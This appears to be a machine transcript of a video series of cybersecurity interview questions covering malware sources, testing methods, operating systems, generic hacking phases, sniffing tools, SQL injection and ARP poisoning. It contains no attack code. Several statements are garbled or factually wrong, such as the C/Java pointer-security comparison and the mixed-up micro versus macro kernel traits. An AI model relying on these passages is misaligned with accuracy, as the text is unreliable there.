regular updates which means that there will be patches that will be released for the application for the software that you're utilizing download the patches install them on a regular basis to ensure that you are secured against the most recent attacks that have been identified install a good antivirus could be an internet security suite which will have an antivirus intrusion detection system a firewall and will help you protect yourself against ransomwares and any script-based attacks also have a specialized firewall on your system could be a host-based firewall or a network-based firewall to ensure that attacks are kept at a minimum and you have your network definitions in place to allow or disallow connections from happening to your devices have anti-phishing software installed as well to ensure that you are not getting any spam mails even if you do you're able to identify that and not fall prey or victim to those spam males phishing attacks are generic where they are directed towards individuals and they prey on the gullibility of that particular individual so our nigerian frauds or the lotteries that we win on a regular basis of hundreds of million dollars those messages the emails that we receive they are all phishing emails where they're basically prone to victimize the user and then drop them off money or install some malware or do some other malicious activity if you want to enhance encryption about data that you have stored on your devices or on your or that is accessed by your software or being transmitted by your software use encryption encrypt your data whether it is at rest whether it is in motion or whether it is at use thus reducing data leakage and data loss possibilities and finally in the foremost secure your dns dns is the domain name server which is utilized by computers to resolve domain names to ip addresses if a dns poisoning attack is possible where your dns settings have been modified by an attacker and you are redirected to a malicious dns server that server is going to redirect you to another malicious application which may have a malware or a malicious software as a payload also you don't want people to know your dns servers and the queries that you're making so you want to use secure dns or dns over https to encrypt your dns queries as well so in a nutshell if you follow these eight steps your devices your computers your applications are going to be as secure as possible the next question discuss security related aspects between c c plus plus and java now this is an open-ended question it depends on which level you're giving an interview on but you're looking at it from a fresher's perspective or a less experienced perspective and thus these are some of the aspects that we want to look at and the comparisons between cc plus plus and java so the five aspects that we are looking at are pointers code translations storage allocation inheritance and overall security uh based on cc plus plus and java so when we say pointers we are looking at how we are going to uh we are using pointers and stacks and heaps to point to functions and how we exit those functions and how those functions are then recalled into the next function so c supports pointers it is most secure c plus plus also supports point pointers but it is a little bit less secure than c java it is not supported direct access is given to memory allocation and thus it is the least secure as far as pointers are concerned when we look at code translations c is able to compile but it is not secure same with cc plus plus but in java it is interpreted language and it is abstracted and secured in storage allocation in c we use malloc and uh catalog memory allocation which is less secure because it does not have internal checks on verifying what memory is allocated and the user input that is being compiled or that is being input to that memory right thus this can allow buffer overflow errors uh to creep in because of the uh non-verification of the input data so it is the least secure in cc plus plus it uses new and delete options and is comparatively secure but java uses a garbage collector and thus is the most secure as well as storage allocation is concerned when we talk about inheritance the most secure is ccp plus plus c has no inheritance so it's not secure in c plus plus it is supported thus it is the most secure whereas in java there's multi inheritance that is not supported and does is comparatively secure overall the most secure out of all these based on these five aspects is java the least secure is c and the mid level is c plus plus moving on to question 13 what are the different sources of malware now malware stands for malicious software right malware is basically a software that poses as a legitimate software but has a payload of a trojan virus spyware keylogger or some malicious software that is going to have a negative impact on security of your particular device so the question here is what are the different sources of malware we want to identify the most common sources through which malwares infect end user devices in today's world and you can start with pop-up ads so most of the websites if you're visiting untrusted sites if you're being redirected to sites that you don't know about there'll be a lot of pop-ups coming your way where it says you're the one millionth visitor to this site please click here to download your gift or it will say congratulations on winning a particular product for visiting this page and so on so forth there are some instances where you can see a banner which is flashing at you on top of the page and says that there are eight uh infections that have been identified on your computer click here to download an antivirus to clean the infections so all of these pop-ups are there as a social engineering attack as a phishing attack to make gullible people click on those links and download those malwares now the software that is posing as a security software itself can be a malicious software which is going to install a trojan or a virus or a bot on your machine compromising the security of that machine the second is removable media usbs and humans have a fascination with usb so if you find a usb lying around it's a free usb you get excited about it and you want to take it home you want to plug it into a machine and see what's on the usb worst case scenario you format it and you've got a free usb to utilize higher the capacity the better but that is one of the most easiest way people use malwares to uh to be deployed on unsuspecting users if there is a usb lying around why would why would somebody want to forget a usb it's most likely planted over there as a social engineering attack so that a gullible person is going to pick it up plug it into their device if the device is not secured enough it is going to install the malware right uh then documents and executable files this is where your viruses and uh all those keeps in so let's say you're surfing on the internet you're looking for a software uh and you find the software on a particular website you do not verify the trustworthiness of that site and you just download and install that software now that software could be malware as well does if you're surfing on the internet you're downloading files from different locations you have to research the website you have to research the source to ensure that it is trustworthy and only then are you going to download and execute those files thus internet downloads as well and when we say internet downloads it's not just untrustworthy sites we go to torrents uh we go to uh the dark web or the deep web and searching for other softwares especially those who are researching security right we always want we are always on the lookout of new softwares and we are always on those forums which may not be so much trustworthy and we just download those files and start installing them that is a very bad scenario right so you have to be very careful what you're downloading from the internet your anti-viruses your anti-fishing mechanisms your threat intelligence mechanisms uh have those uh mechanisms installed and you want to verify where your downloads are coming from then your network connections if it is a p2p connection it is a local area network connection or a metropolitan area network you have to verify whom which devices are connected to your machines and you have to validate those connections before you want to trust those devices and before you connect to them if you're on a public wi-fi you probably don't want to connect to a public wi-fi in the first place then comes email attachments there are so many attachments that come across in today's world most of them in a zip format or a rar format uh some of them come as document files where there are macros hidden within them macros are scripts that are recognized by microsoft office files right and then finally there are these vanishes advertisements that we find online right uh let it be facebook let it be whatsapp let it be uh any social media platform that you go or even your search engines their job is to display ads their job is not to verify whether the ad is legit or not it is for us as consumers to be careful and validate that ad and verify whether it is a genuine ad or not so just don't start clicking on uh any of the ad trusting uh the platform that you're on be sure that you are investigating that so these are the most common sources of malware and the end user will always get infected by one of these mechanisms moving on to question 14 how does email work now this is a very uh can be a complex question uh but we have to keep it as simple as possible and we have to identify that there are uh two servers while uh both of them either using smtp which is the simple message transfer protocol where in this scenario john wants to send an email thus they've got an email client installed on their machine which is connected to the mail exchange server which has a dns server which maps the routing and which maps the exchange server and inboxes so when john composes that message and clicks on send john should be connected to a mail exchange server where the email is sent through that particular person's inbox so so john's inbox will then uh be validated and that email will then be sent through the dns server uh through the internet and will be received by the recipient mail server so at this point in time john also requires the recipient's email address so in this case this is jack so jack something dot com would be uh the email address so while john is composing uh the two field will have jack's email address the from field will have john's email address the subject field will have uh whatever they want to convey as a message the message body will have the message itself and then when john clicks on send it will go to their server the exchange server will then validate the inbox and identify where that inbox is located for jack and then through the internet it will be sent to the uh to the mail server of jack the mail server will then identify the proper inbox that it now that that email is to be sent to and it will store that email in that particular inbox when jack opens their computer and accesses their inbox this email from john will be already waiting for them and they can respond to it the same way john had sent that email if getting your learning started is half the battle what if you could do that for free visit skill up by simply learn click on the link in the description to know more moving on to question 15 what are the types of threats a company can face right and this is where your threat modelling comes into the picture so you're looking at software you're looking at operating systems and the company comes and asks you uh what are the threats that are most likely that a company will face so on a broader scale the threats that a company will always face would be classified as natural threats man-made threats technical threats and a supply system threat so a natural threat would be an act of god which is outside the control of human beings could be storms or any natural occurrences like volcanoes thunderstorms flooding earthquakes fire and so on so forth so anything that is natural so it depends on the geographic location that you're in and what kind of climate that area faces and you need to identify the immediate threats and prepare for them so if it is flooding that you're looking at and you want to look at an office uh and the possibility of the office getting flooded is real you probably want to take office at a higher floor so that the threat of flooding is minimized for fire we always have a fire drill where we practice our fire mechanism so that we can evacuate all humans as soon as possible and then worry about the technicalities of it under any circumstances under any threats humans will always have the first priority and then everything else comes in manmade threats are where man themselves are a problem so strikes lockouts hackers theft uh war writing all of those are man-made threats uh which we ourselves cannot be in control of but we need to plan for them and we need to have a business continuity plan or a disaster if you plan for any of these threats that have been identified then come the technical threats technical could be software bugs operating system bugs application bugs that uh that come with the applications that we have or a hardware failure where a server crashes a hard disk crashes maybe the processor stops working the motherboard stops working ram gets corrupted any of the technical aspects a stopping uh stop functioning does creating a break in the business can come under technical right so uh anything to do with computers let's say a server failing or a patch that is not installed on a particular software those would come under technical threats and then the supply system the supply system are your environmental threats which depart depend on your supply chain failures what is the supply chain for the office to function there are a lot of dependencies that office goes through right there are a lot of other vendors that suppose that support and provide critical infrastructure non-critical infrastructure for the office to function for first and foremost electricity without electricity nothing is going to be powered on and you're not going to be able to function so if there is an electricity service provider and if there's an electric outage that's that comes under supply system so that's the supply chain failure where the vendor that provides electricity to you has failed in providing that particular service and now you need a business continuity or a disaster recovery plan so you probably have an inverter or you already have a power generator plant that is going to generate your own power and supply to your system right there could be short circuits because of fluctuation in the electricity uh maybe the internet service provider fails and your internet caches so you have a backup line for the internet from a different vendor right and so on so forth maybe your hardware vendors who are supplying you servers desktops laptops and whatnot they fail because they feel they are facing a strike or they go bankrupt and suddenly you can no longer purchase hardware from your vendor because they no longer are in business so that's a supply chain failure so any of these systems failing would also come under threats so under a broad category these are the first four threads that you need to identify and then you can elaborate by providing more scenarios based on the experiences that you have had towards each and every of these threats so natural threat where you may have had experience where there would have been let's say flooding uh or any natural disaster which caused a problem for the continuity of your particular business so identify each and every example for each of these threats and provide that as an example in the interview what is black box and white box testing so when you are testing a software or you're testing your infrastructure there are two different tests that you can conduct the first one is a black box the second one is a white box in a black box test there is no knowledge that is shared with the tester so let's say you're a ethical hacker and you have been awarded a contract by an organization to test the current application that they have developed now they are not going to give you any information they are not going to tell you what the application is they just probably give you an ip address and a port number where the application is hosted and now you have to fire in your own queries and try to figure out what the application is try to gather information see what uh what information can be gathered in the first place and based on that you're going to figure out your way identify your vulnerabilities and see if any of those vulnerabilities can lead to an security incident so without any knowledge zero knowledge of the id infrastructure or the source code that's a black box attack or a black box test a white box test on the other hand is where full knowledge of the id infrastructure of the source code is shared so the ethical hacker has complete knowledge and based on the knowledge they are then going to test out the system to see if there are any flaws that they can identify right so why would these two audits be important because the first one a black box audit emulates the attack of a outsider a external hacker sitting outside the organization trying to figure their way in whereas a white box attack can emulate the attack of an insider so a disgruntled employee within that organization misusing their access controls or the access rights to make uh unvalidated profits right so somebody's corrupt who has been bribed who wants to sell out company secrets based uh so they're going to try to find out vulnerabilities try to steal data and try to sell it on the uh gray market right so a white box would emulate an internal attack a black box would emulate an external attack moving on to question 17 what is use case testing now use case testing is a functional test and it is also a black box test right what is a functional test it tests the functionality of a particular software once it has been created why is it a black box test because the user doesn't know what the functionality is they just want to find out each and every scenario and try to see what that scenario generates as a response they are not sure whether that is the appropriate response that should be generated or not they're just trying to find out the response that is going to be generated after they fire off a query so this technique is used by testers to get the test scenarios to exercise the whole system from start to finish so let's say it's a login mechanism for an application right now a user at this point in time the tester since it's a black box testing will know that it is a login mechanism they will not know the details of what logging mechanisms are being utilized so they wouldn't know whether uh input validation is done they wouldn't know whether output encoding is done they wouldn't know how the cgi calls are being made they will not know how the queries are handled at the server side and how the database is going to treat that particular query so they have no idea whether sql injection attacks are possible and so on so forth so for them with whatever input they are going to try to insert for that login mechanism that's a functional black box test the functionality being whether the login mechanism works and based on the type of inputs that are going to put in whether it creates an unwarranted output whether they can bypass the mechanism or they can hack into the system because of some of the flaws that were left behind right another example here is a software made for users to use for documentation the testers will test all the cases that the user can do so can the user view a document can they add new documents can they edit documents and can they delete documents so this functionality will depend upon the access controls that have been granted to a particular user so for this particular user the tester at this point in time they would not know whether they're an administrative user or they're a regular user they'll just try to do all of these and then write the responses saying i was able to view i was able to add i was able to edit and i was able to delete now the result will be then sent to a manager the manager will look at the results and then based on the actual access controls that were supposed to be there for this particular user then we'll try to identify whether this is an acceptable case or whether there were any flaws within this case moving on to question 18 what is static and dynamic testing now this is again in application testing static testing is done in an early stage of development life cycle now software development life cycles there are multiple of those what are these life cycles there are different stages in which a application is created and provided to the customer so your first stage would be determining the scope of the application determining the hardware requirements for that application then creating a flowchart for that application a functional chart for that application and then maybe start coding then an architect comes in tests the code verifies the code then the testing phase comes in then the security testing phase comes in and then the user acceptance testing comes in but in every stage at the very earliest or first stage a static test will always be started to see whatever code has been developed whatever uh scope has been developed whether that scope is going to be correct or not this will include walkthroughs and code review what is a walkthrough a walkthrough is going through documents that have been generated and trying to find faults in the documented journey that has been talk that has been created so far so let's say somebody has created a workflow or a flowchart for a program how the functions are going to be called and how they're going to be executed so a walkthrough would be where uh all these responsible people will walk through that particular flowchart and find out any flaws within that and then rectify them if there is any code that has already been written this code will be reviewed manually and any flaws within that code would then be identified static testing will always be 100 accurate in a very short amount of time because it is immediate uh you have created it and then the export is going to test it to see whether everything is fine or not right it is all about prevention mechanism so since you are doing it at the inception itself if you find any flaw it gets immediately repaired so this is about preventing vulnerabilities from keeping into that application at a later point in time whereas dynamic on the other side is done at the end of the development life cycle so you have generated the application everything is ready now you want to do dynamic testing includes functional and non-functional testing functional testing is where the application itself is being tested the functions to see that all the parameters that are given to the application are functioning properly non-functional testing would be where security parameters administrative parameters all of them are being verified right this is where your test case scenarios come in and uh you're going to test each and every scenario by generating inputs and analyzing the output that the application is going to give you dynamic testing is all about cure so here you're going to identify vulnerabilities report them to the management and the management is then going to figure out a way of patching those vulnerabilities so that they can be mitigated moving on to the next question what are the test levels in software testing so as far as software testing is concerned there are four test levels module testing integration testing system testing and the final one is acceptance testing so in the testing phase of your development life cycle the first thing is a module test you're going to check your routines your subroutines your subprograms procedures that have been written in a program so all your functions all your mechanisms for that application are going to be tested when you go into integration testing the software may have been integrated with multiple softwares there may be different api calls coming in maybe a third party software on which you are depending upon to supply for information so all of these integration of various softwares various apis are tested to ensure that they are functioning properly and there are no flaws errors or mistakes leave behind in the integration of all of these softwares then the system testing is where the entire system so including the hardware including the software right it starts from the installation so now the software is complete we know which hardware we are going to support for it we start by installing the software and see whether installation is going to be completed properly if there are any errors in the installation process itself then once it is installed the performance of that particular application the write speeds the read speeds on the hard disk the transaction speeds that the application is capable of the network dependencies that the application may have all of those would come under system testing and then the acceptance testing which is basically a quality assurance exercise that the application meets the client's requirements so the client in the first stage would have given the scope of what needs to be achieved in the acceptance testing you're verifying that that scope has been met and the client requirements uh have been met and you can assure the client about the functionality and the performance of that particular application coming to the last question in this software programs what are the valuable steps to resolve issues while testing so in the previous scenarios when we have started testing now if you find out when you execute a particular use case and then you find out of law what would be the steps that you would utilize to address those particular flaws in those tests the first step will always be record then you're going to report it and then you're going to introduce a control process for it so when you say record you're going to create logs and you're going to try to resolve all the problems that have happened now when you say resolve you're not going to record the application but you're going to test the system again and again to ensure that whatever is being recorded is accurate and all the logs all the error mechanisms all the dumps all of those that have been generated due to this particular log about due to this particular error are being captured so that they can be reported to the higher level managers so the next step is once you have re eventually accumulated all these logs and records you're going to report them to the higher level managers who are then going to investigate it and go back to the developers trying to figure out the best way to mitigate those particular flaws so the report writing needs also also needs to be accurate uh it needs to be to the point uh it needs to detail what the problem was it will document all the steps that there were that you took all the inputs that you put in and it will also record all the errors and it will also record all the mechanisms that were utilized and the errors that were generated and that report will be given to the higher level managers who can then forward it to the developers who based on those reports can draw start their troubleshooting and then the control mechanism comes in you're going to define the issue management process so this process needs to work in a particular manner where you're doing a test you're recording whatever is happening you're creating a report out of it you're sending it to the management the management will then take those reports study them take it to the developers the developers will test based on their criterias they might interact with the testers at that point in time to identify particular flaws and then they might want to record that application on a developer patch which once installed will mitigate that particular flaw and then it can come back to the testing phase again where you can repeat those tests and validate that the flaw is no longer existing so these are the three steps that would be uh utilized for testing purposes and that brings us to the first 10 questions on the software platform in the next video we'll be looking at operating systems and applications the first question is on virtual memory what exactly is virtual memory for a computer we have two types of memory the first is the primary memory which is your random access memory which is also known as a volatile memory and the secondary memory is your hard disk where your data is stored permanently but for a computer when it has let's say a 4gb memory or a ram as in this scenario on your screen it is going to replicate that and is going to create another 4 gb of virtual memory on the hard disk and it is going to use it in tandem along with the ram so if the ram is insufficient the processor is going to utilize the 4gb of the virtual memory that is created on the hard disk and it is going to swap data from the ram to the hard disk this can also be known as a page file or a swap file the next question is what are different scheduling algorithms now the context for this question is you're talking about a profi a processor and you're talking about how processors are going to be fed to the processor and how the process is going to treat these processes so the first is first come first self so the process which requests the cpu first gets the cpu allocation first now whenever there are processes that are being run by different applications they make requests for some cpu type now in first come first serve the first service or the first process that is going to request some processing time will get that much allocated to them they will run through the process first and the next and the next and so on so forth the second one is the shortest job first this is the process where the shortest execution time for that process is calculated and that process is selected first for the cpu then there is priority scheduling this scheduler selects the task to work as per priority so there would be some tasks that are marked with high priority some would be normal and some would be low so based on this high normal or low priority uh all the processes will be classified higher priority will be dealt with first then the normal and then the least priority the fourth option is multiple level queues where processors are assigned to a queue based on the specific property like process priority the size of memory etc so it will be classified based on the attributes given to that particular process and multiple cues will be created and then based on the attributes the processes will be processed by the cpu then shortest remaining time the process will be allocated to the task which is closest to its completion so or you look at it this way the process that will take the least time to complete its processing would be chosen first and then the round robin method where each process comes in turn gets an equal share of time so if there are 10 processors each process will be allocated a certain amount of time after which the next process will be processed and so on so forth and it will continue in a round robin fashion till all the processes get executed so in short six different scheduling algorithms depending on how you how the operating system deals with it the next question is what are the steps involved in hacking a server or a network so this is more of an ethical hacking question you're looking at devices and for and the interviewer asks you uh what kind of steps are involved what are the activities that you would do in hacking a server or a network now there are no specific steps that you would define because every hack is going to be unique but it has a hack can be classified in five different steps which are quite generic right so the first step will always always be the recognizance step also known as information gathering phase also known as footprinting or fingerprinting depending on what exactly you're doing but in this phase the attacker gathers all the evidence all the information that is possible about the targets that they want to attack so here you're trying to get to know the victims so you can launch specific attacks towards them you want to identify what operating system they are utilizing what ip addresses mac addresses the versions of the operating systems and applications the patch levels find out vulnerabilities find out whatever information is possible find out the information about the person who's using those computers so you can launch social engineering attacks and so on so forth so the first step is all about gathering enough information based on which you can launch further attacks once you have that information comes the second phase which is known as the scanning phase this is more of a technical phase so you're right in the first step you've got your ip addresses domain names maybe even network maps and you have identified which devices are available now in the scanning phase you're going to identify live devices and then you're going to scan them for open ports processors protocols services you're going to identify vulnerabilities you're going to enumerate them to identify more information from them thus at this point in time you will have identified a certain set of vulnerabilities or a certain set of security loopholes that you can misuse once you have identified those you're going to the next step which is the gaining access state in this you are actually going to execute your attacks based on the vulnerabilities that you have found and you are either going to gain access to that particular system by installing a trojan or destroy the system by installing a virus or install a spyware or a keylogger whatever you wanted to achieve so in the gaining access phase you would have based on the knowledge that you gain in the first and the second phase you're going to launch your attacks and you're going to try to gain access to that particular device then the next step is where you're going to maintain that access now that you have hacked into that device it is not necessary that you will always be able to get access to that device uh suppose you have cracked the password of that particular user and the user changes that password after a few days your attack is worthless so what you're going to do here is you're going to maintain your access so this is where it is assumed that you want repeated access to that device and thus you're going to install a keylogger or a trojan or some mechanism which will still allow you to get access to that device without the knowledge or the authorization of that particular user and finally the last step is where you're going to cover your tracks so whatever activity that we have done so far will have created logs and will have created information based on which the victim will come to know that they have been compromised and may be able to trace that activity back to you so to prevent the user or the victim from realizing that they have been hacked and to prevent them to discover who has hacked them you want to cover your tracks by deleting logs and any references that point to that particular activity you're going to hide the files that you have created so you have installed a trojan or a key logger these will create files and directories you're going to hide them so that they are not discovered you're going to hide processes that have been created you're going to try to hide all the activity that you have done so that to conceal the actual attack and preventing the user from realizing that they have been compromised so these are the five steps that will be involved in hacking a server network application or any computing device you'll come across the next question refers to what are the various sniffing tools now this is a network-based attack where you're trying to capture uh data packages that that are being transmitted over the network and then you're going to analyze them to see if you can capture any sensitive information like usernames passwords bank details or any anything of that sort now these tools will also depend on which operating system you're utilizing for example msn sniffer would work on microsoft uh operating systems eater cab would be based on linux and so on so forth so on the screen you'll see six different sniffing tools that work on different operating systems wireshark is uh something that is common both on windows and linux it is used to analyze network in detail it is the de facto tool that we will come across in most of your ethical hacking trainings in most of your organizations when they want to do data captures now data capturing or packet capturing is not only done by hackers to gather more information but is also a known troubleshooting technique used by administrators and network administrators to analyze any issues that may be going on in the network right so while the first tool you see on the screen is wireshark like we stated is available for windows linux as well then there is tcp dump which again has the same capability of wireshark but is a command line version whereas wireshark also has a gui a graphical user interface tcp dump is available on linux msn sniffer it's a very old tool uh when we had msn messengers msn messenger is no longer there but microsoft does or did have a microsoft message analyzer tool uh which they have stopped development since 2015 uh but that's another tool that is specific for microsoft operating systems from microsoft that can be installed together more information then you've got ethercap which is a tool to launch man in the middle attacks data capturing and is is essentially a linux command line based tool then dsniff is another password and network capturing tool which can help you capture data packets prominently a linux tool same with eatery this is a graphical tool which will allow you to capture data data traffics and map protocols and identify which ip addresses have been communicating with what essentially all of the tools have similar functionality except that uh some have additional functionality like launching manual attacks or capturing or having specific filters that will help you identify and troubleshoot some network issues that you may be facing moving on to the next question what is an operating system now this is a very difficult question to answer because uh we normally when we want to answer this question we start off with the functionality of an operating system right we try to describe what windows does or what linux does or what mac os does and then we are trying to figure out what an operating system is in the first place but an operating system essentially as the slide says is a software program that provides a platform for computer hardware to communicate and operate with the computer software so it is basically an enabler for human interaction with the hardware that you have if you take the operating system out of the question it's just some hardware which cannot interact with you but essentially when you have operating system like microsoft windows or linux or mac you're essentially essentially installing an instruction set on that particular device which will allow you to interact and manipulate the hardware to do whatever you want that hardware to do right essentially when we talk about uh drivers for your various devices like a driver for your lan card or for your sound card or your graphics card which allows you to tweak these cards uh for a functionality right it allows us input and output functions uh for example the basic example you open up microsoft office products like microsoft word or excel and you get a gui on the screen uh which you can interact with you've got a keyboard and you type on that keyboard and the computer knows what you're typing and reflects those actions on the screen by showcasing it on that particular excel file or a word file so how does the computer know what to do or what you're exactly intending to do at this point in time it is all the operating system that is providing you all these services analyzing what your inputs are and then based on the programming it is going to execute that and show it to you on the screen right some of the most common commonly used operating system are microsoft windows you have them in desktop as well as server variants unix linux again linux as desktop and uh servers you've got ubuntu and linux red hat and so on so forth and then you've got mac os for apple related components the next question what is the difference between micro kernel and macro kernel now the first thing we need to know is what is the kernel kernel is the heart of the operating system that allows that input and output to happen it allows those drivers to be set up so that the hardware can interact with the software and we can then instruct the software and the hardware both to function in a particular manner so there are two types of kernels micro kernels and a macro kernel micro kernel is something that we normally use micro kernels are for operating systems that use processors directly handled by the processor the micro kernel is very small in size uh micro kernel is large because it basically is an entire image of the operating system the execution for a micro kernel is slow the micro kernel is going to be faster because it is more evolved there's a lot of programming involved extendability microkernels are easy to extend micro micro kernels are hard to extend as far as security is concerned if a micro kernel crashes it takes everything down with it the entire operating system is going to crash but in case of a micro kernel it is only that particular process that is going to get affected microkernel there is a lot of coding involved micro kernel less coding is involved examples of micro kernels would be simply an oss most popularly used on yesteryear phones nokias if you remember those uh qnx and so on so forth micro kernels your linux or bsg operating systems essentially use macro kernels next question what are the different types of operating systems so as you can see on the screen five types of operating systems batched os distributed operating systems time sharing multi-program and real-time what are batched operating systems the computer operator places the jobs coming from input devices into batches so consider this not from a desktop perspective but from a server perspective where these devices are used by organizations to compute and to crunch some processes that is going to make some business sense out of it so when there are multiple processes coming in multiple jobs that are going to be scheduled a batch os is going to place these jobs in batches and they're going to crunch those based on the inputs that have been given by these operators distributed oss where there are multiple computers which are interconnected and are communicating through networks so in a corporate environment you don't use one single computer to do everything you've got a data center and the data center will have a cluster of servers where they're going to share some resources to crunch one particular task right so that's where your distributed oss come into the picture then you have time sharing oss where you are renting some time so time sharing voices minimizes the response time example in today's world cloud right uh you go on to the cloud you have a virtual service over there you scheduled something you showed you the job over there it is it is executed and for that time being that operating system services your particular request and provides you that particular job any application that you see online that is executed for example facebook from a consumer's perspective could be a time shared experience then multi-programmed os the operating system uses cpu shuttling to separate jobs so you're scheduling the cpu to complete certain jobs in this particular manner and in real time os the operating system gives maximum time to critical operations so it identifies the priority of these operations it knows the high priority items the medium low priority items and based on that it is going to execute these critical operations and get the job done moving on to the next question what is the difference between logical address space and physical address space now when you're looking at address spaces this is where applications come into the picture and when you execute an application it is going to create a particular address in the memory where it is going to create a buffer to store its own information so that it can be provided to the processor processed and then can be returned back to the application as an output right so as far as definitions are concerned a logical address is generated during running of an application or a program a physical address is a physical address or a physical location on the memory module itself right visibility you can view a logical address because it is programmed into a computer so if i'm looking at cc plus and i'm using malloc or memory allocation uh that's where the logical address is going to be created where a buffer is going to be created for that program and whatever the user input is going to be it's going to be stored in that buffer but whereas physical addresses are concerned this logical address will be created on a physical store or a physical memory module which will have its own addressing mechanism thus you you can see the memory module but you cannot see the specific address on that particular memory module but as far as a logical address is concerned while you're programming or you're debugging the application it will show you the logical address that has been created the start point and the end point of the logical address that has been created for that particular program it can be shown in a debugging environment right address space logical and physical address is physical like here this case it's the memory module itself you can access only the physical address on that particular memory because logical addresses can be viewed but you cannot access them physically uh generation uh the logical addresses are generated by the cpu uh during the processing time whereas physical addresses are generated are computed by the memory management unit or the mmu that you have on your computers and as far as logical addresses they will always be they are variable whereas the physical address is always going to be constant looking at the next question what is the difference between logical address space and physical active space so moving on from the previous question to this the logical address is a address created by the cpu for the processors that need to be addressed and that can be stored as a buffer in the physical memory whereas the physical memory itself is going to be a address that is going to be there on the physical part of that memory which is uh which is going to be assigned to it by the mmu then the next question discusses uh shells so what shells are used in linux now what is the shell shell is the command line interface that we utilize on a linux machine so the terminal window as we call it is a shell and there are different variations of a shell based on what linux operating systems you're using the desktop operating systems that you use uh or the server operating systems and real in today's world that you're going to use normally you will always have a bash shell which is the first shell that you see on the screen known as a bone again shell it is a default for linux distribution so as far as end consumers regular consumers are concerned it is always going to be a bash shell a bone again shell that you're going to utilize for scripting and to execute regular commands but when it comes to high level programming or it comes to specialization tasks then you've got the rest of these shells that you can utilize for example the ksh known as a con shell is used for high level programming which supports associative arrays and built-in operations the csh or the c shell has different functionality like spelling corrections and drop controls the zsh or the z-shell provides unique features like file generation startup files and fish friendly interactive shell which provides features like auto suggestions and configuration so all of these have different functionalities depending on what uh usage that you have for that particular shell the most common shell like i stated is the bash shell that you'll always come across in your desktop linux operating systems then looking at the next question what are the process states in linux now what is a process process is basically a service that is running for a particular application for an application to function right this process is going to direct user input to the processor process it get that output back to the application execute it and then show it onto the graphical user interface for the user so in linux there are five states for a process first is the ready space now in ready in this state the process is created and it is ready to run so it is waiting uh it is waiting for input it's ready uh the application is executed the running is when the process is being executed itself blocked or wait is when user input is being looked upon so it's waiting for user input so that it can do the processing completed or terminated it has completed its execution or was terminated by the operating system for some reason or the other so this is where things have uh the processing has been completed and then lasted state is zombie where the process is terminated but the process table still holds the information uh maybe it is waiting for the kill request before it gets terminated so these are the five states for a linux process to be in and that brings us to the ten questions in the operating system and application space in the next video we'll be looking at 10 more questions on cyber attacks interview questions based on cyber attacks let's start off with the first one the first question is what is sql injection sql stands for structured query language which is a language that is used by most of your databases or your relational databases the variations of your database would be mysql microsoft sql oracle sql you'll have ibm databases all of these databases utilize the structured query languages to interact with the applications now all of these databases have their own syntax so we'll have to study most of these databases based on which applications and which databases you want to provide security for but as the name suggests sql injection vulnerability or structured query language injection vulnerability is where a user can maliciously inject a sql input or a sql statement in a query and send it to the database and evoke a response response out of it so this vulnerability is not specifically to the database it uh the vulnerability lies more in the application and the coding of that application so when the application receives a query which it needs to be forwarded to the sql database we need to configure and the application level of what queries are allowed and what queries are not allowed so there are different various aspects of how to manage a sql injection vulnerability but the basic flaw lies in the application where invalidated input is accepted and sent forward to the database where the database might confuse it into an executable statement and thus create a response that was not warranted there are various types of sql injections uh as shown on the screen in-band sequel injection where you can look at an error based or a union based injection a blind sql injection where it is either boolean based or a time-based attack and then an out-of-bound sql injection essentially you're looking at databases and you're looking at application security where you want to encourage secure coding practices so an unvalidated input is mitigated the next question is what is spoofing now in spoofing you're basically assuming the identity of another person so here the attacker pretends to be some other person or an organization and sends you an email that appears to be a legitimate email it looks almost genuine it has been constructed to replicate what a genuine email would have been and it is very difficult to spot a fake one there are different ways to identify whether email is genuine or not but that's for a different video moving on to the next question what is a distributed denial of service attack or a ddos attack now generally a denial of service attack is an attack where legitimate users are prevented access to the resources that they legitimately can access right so for example if it is a bandwidth-based attack the attacker consumes the bandwidth of the network in such a way that there is no more bandwidth left for legitimate users to access the network now a single device may not be able to generate that much amount of traffic to consume the bandwidth of a huge server thus the attacker will construct a bot net and through that botnet they will launch a distributed denial of service attack to the target victim right so a botnet uh there are two terms that you want to look at over here the first term is a bot and the second one being the botnet itself bot is a software that once installed on a victim's machine allows the hacker to send remote commands to that machine that will make it to generate some activity once we have enough machines on which such bots have been implemented the collection of these machines would be known as a botnet so an attacker would then instruct this entire botnet to start generating data traffic to be to be sent to the targeted network or to the targeted server which will then bog down the server thus crashing it and preventing users from accessing that particular resource the next question is how to avoid our poisoning or arp now first let's understand what arp is arp stands for address resolution protocol which is a protocol used by computers to communicate over the network once your computer boots up it starts a discovery process of identifying its neighbors so if i'm in a particular subnet my machine will proactively send out arp request an address resolution protocol to find out which other machines are within the same network and which are live once it sends out a query a live machine will respond to that query along with its mac address this information is then stored in what is known as a arp table or an arp table on the machines cache so whenever my machine now wants to send out a packet to this particular machine it will go to the arp table it will identify the ip address and the associated mac address it will print that onto the data packet as a destination ip and destination mac and send that packet across to the switch the switch will then identify the mac address to send the packet to the relevant machine that is connected to that particular switch now to confuse the switch into sending it to a different machine our poisoning attack is created this attack is generally launched to create a man in the middle attack now to prevent this our poisoning from happening in the first place there are three different aspects that we can utilize first we can use packet filtering which will filter out and block packets that are the same source address data so you have identified some malicious ip addresses and you want to block out some ip addresses so you're using a packet filter firewall where you have constructed the firewall to filter out certain packets originating from particular range of ip addresses this firewall and this technique will then block those kind of packets coming in second keeping away from trust relationships organizations will develop protocols that do not depend on trust relationships and thus you want to keep this protocol away from that once you have created a trust relationship these machines should not be sending out arp requests to other machines in the first place since uh that translation has been has been defined and these machines know whom to communicate with such kind of protocols should then be disabled or you can use arp spoofing software so there are some there are software's out there that will look for arp spoofing and prevent that from happening in the first place so if somebody has sent out a spoofed arp packet that packet will be picked up by this software and it will be mitigated of network visualizers like glass wire anti-viruses like so force they haven't built capabilities of identifying uh our up spoofing attacks and mitigate them in the first place in the next question we are going to discuss what is ransomware now ransomware is a type of malware that blocks victims to access personal files and demands ransom to regain access there are three categories before we go into the categories let's just revisit what ransomware is let's start with the word malware malware is a malicious software that poses as a legitimate software but has a payload that will have a security impact on your machine so in this instance uh viruses trojans all of these can be classified under malwares so can ransomware a trojan is a software that will give you a backdoor access to it to a particular device a virus will do some destructive activity on that device a ransomware will basically encrypt the data of that particular user from on that particular machine thus rendering that my that data inaccessible to the users themselves and in turn will demand a ransom to provide access to that particular data so the three types of ransomwares the first one is scareware which uses social engineering to cause anxiety or the perception of a threat to manipulate users into buying unwanted software so this preys on the gullibility of humans where you can see a pop-up appearing on your screen which can scare 